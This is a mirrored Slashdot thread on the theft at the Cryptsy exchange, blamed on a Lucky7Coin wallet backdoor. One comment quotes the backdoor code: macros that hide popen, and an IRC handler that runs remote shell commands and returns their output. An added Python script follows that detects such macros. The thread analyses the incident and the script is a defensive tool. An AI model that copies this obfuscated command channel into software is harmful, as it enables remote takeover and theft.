Slashdot Mirror


Cryptsy Bitcoin Trader Robbed, Blames Backdoor In the Code of a Wallet (softpedia.com)

An anonymous reader writes: Cryptsy, a website for trading Bitcoin, Litecoin, and other smaller crypto-currencies, announced a security incident, accusing the developer of Lucky7Coin of stealing 13,000 Bitcoin and 300,000 Litecoin, which at today's rate stands at more than $5.7 million / €5.2 million. Cryptsy says "the developer of Lucky7Coin had placed an IRC backdoor into the code of [a] wallet, which allowed it to act as a sort of a Trojan, or command and control unit." Coincidentally this also explains why two days after the attack was carried out, exactly 300,000 Litecoin were dumped on the BTC-e exchange, driving Litecoin price down from $9.5 to $2.


  1. known for months by Gravis Zero · Score: 5, Informative

    https://github.com/alerj78/luc...

    dooglus commented on Mar 8, 2015

    There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.

    In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:

    /** Determine system page size in bytes */
    #define S_ORDER(a,b,c,d) b##a##d##c /**
      * OS-dependent memory page locking/unlocking.
      * Defined as policy class to make stubbing for test possible.
      */
    #define CLine S_ORDER(I,F,E,L) /**
      * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
      * std::allocator templates.
      */
    #define CRead S_ORDER(p,po,n,e)
    #define CFree S_ORDER(cl,p,e,os) // // Allocator that locks its contents from being paged // out of memory and clears its contents before deletion. //
    #define CBuff "PR" "IV" "M" "SG"

    Then in irc.cpp they are used to implement the backdoor:

    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
        {
            CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
            if (buf) {
                std::string result = "";
                while (!feof(buf))
                    if (fgets(pszName, sizeof(pszName), buf) != NULL)
                        result += pszName;
                CFree(buf);
                strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
                if (strchr(pszName, '!'))
                    *strchr(pszName, '!') = '\0';
                Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
            }
        }

    I expect this is a known issue since this kind of thing doesn't happen accidentally.

    --
    Anons need not reply. Questions end with a question mark.
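
An added example, not part of the thread or of the Lucky7Coin source: a small Python review aid that resolves the kind of `##` token-pasting and split-string macros quoted in the comment above, so a reviewer sees what each one really expands to. The function names, the watchlist and the narrow single-line `#define` handling are assumptions of this sketch; `SAMPLE` reuses the macro lines quoted in the comment.

```python
import re

# Library calls that should never appear only as pasted fragments (watchlist is an assumption).
WATCHLIST = {"popen", "pclose", "system", "execl", "execv", "execve"}
FUNC_DEFINE = re.compile(r'^\s*#\s*define\s+(\w+)\(([^)]*)\)\s+(.*)$')
OBJ_DEFINE = re.compile(r'^\s*#\s*define\s+(\w+)\s+(.*)$')
CALL = re.compile(r'^(\w+)\(([^()]*)\)')
STRINGS = re.compile(r'^(?:"[^"]*"\s*){2,}')

# Macro lines as quoted in the comment above, including the comment text they hide behind.
SAMPLE = r'''
#define S_ORDER(a,b,c,d) b##a##d##c /**
#define CLine S_ORDER(I,F,E,L) /**
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os) // // Allocator that locks its contents
#define CBuff "PR" "IV" "M" "SG"
'''

def strip_comments(body):
    """Cut a macro body at the first /* or // so trailing comment text is ignored."""
    return re.split(r'/\*|//', body, maxsplit=1)[0].strip()

def resolve_macros(source):
    """Return {macro: expansion} for macros built by ## pasting or split string literals."""
    pasters, resolved = {}, {}
    for line in source.splitlines():
        m = FUNC_DEFINE.match(line)
        if m and "##" in strip_comments(m.group(3)):
            params = [p.strip() for p in m.group(2).split(",")]
            pasters[m.group(1)] = (params, strip_comments(m.group(3)))
            continue
        m = OBJ_DEFINE.match(line)
        if not m:
            continue
        name, body = m.group(1), strip_comments(m.group(2))
        call = CALL.match(body)
        if call and call.group(1) in pasters:
            params, template = pasters[call.group(1)]
            binding = dict(zip(params, (a.strip() for a in call.group(2).split(","))))
            resolved[name] = "".join(binding.get(t.strip(), t.strip()) for t in template.split("##"))
        elif STRINGS.match(body):
            resolved[name] = "".join(re.findall(r'"([^"]*)"', body))
    return resolved

def flag(source):
    """Subset of resolved macros whose expansion is a watchlisted call."""
    return {k: v for k, v in resolve_macros(source).items() if v in WATCHLIST}

if __name__ == "__main__":
    print(resolve_macros(SAMPLE), flag(SAMPLE))
```

Running the compiler's preprocessor over the file and reviewing its output is the authoritative check; a script like this only helps triage which headers deserve that look.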
    1. Re: known for months by Anonymous Coward · Score: 2, Informative

      IRC was one of the initial means of peer discovery. It has been long since replaced with better mechanisms.

  2. The Developer of Lucky7Coin... by Fnord666 · Score: 4, Informative

    It was not the developer of Lucky7Coin that introduced this backdoor, or at least not the original developer. The heart of this attack was social engineering. Lucky7Coin support had been abandoned. Someone else came along, claiming that they were taking over support for this particular altcoin. They even created a new GitHub repo for it. As part of the initial commit, though, they introduced a backdoor. Cryptsy picked up the new version of the code and the rest is history.

    --
    'The tyrant will always find pretext for his tyranny.' - Aesop's Fables
  3. Re: No sympathy here. by Applehu Akbar · Score: 1, Informative

    All of those things you mentioned are not a currency. When the stock market crashed, or the dot com bubble crashed, or the "global financial meltdown" happened, did the 10 dollars in your pocket turn into 2 dollars?

    No, it took Jimmy Carter to do that.